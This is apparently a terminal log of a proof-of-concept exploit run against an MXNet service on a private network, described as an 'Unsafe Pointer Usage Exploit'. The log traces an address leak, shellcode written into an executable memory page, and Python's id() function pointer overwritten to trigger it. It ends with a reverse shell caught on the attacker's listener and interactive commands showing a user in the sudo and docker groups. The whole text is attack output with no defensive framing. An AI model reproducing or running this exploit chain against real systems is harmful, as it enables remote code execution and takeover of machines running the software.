$ python3 x.py http://192.168.200.185:5000 192.168.200.186 1337
******** MXNet Unsafe Pointer Usage Exploit ********
[i] got id 0x7fde61190d10
[+] derived RWX_ADDR: 0x7ffe3d3ae000
[+] set RWX_ADDR += 0x800 (halfway through page): 0x7ffe3d3ae800
[+] Writing shellcode to 0x7ffe3d3ae800
[+] Shellcode written!
[+] Deriving address of Python3 builting function id...
[+] Overwriting id() function pointer with address to shellcode...
[w] w64(0x7fde61190d40, 0x7ffe3d3ae800)
[^] Setting up listening shell...
[+] Trying to bind to 192.168.200.186 on port 1337: Done
[+] Waiting for connections on 192.168.200.186:1337: Got connection from 192.168.200.185 on port 57048
[+] Triggering the exploit!
[------------------------------------------------------------]
[+] Received a shell!!!
[------------------------------------------------------------]
[*] Switching to interactive mode
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)
user
/home/user
$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)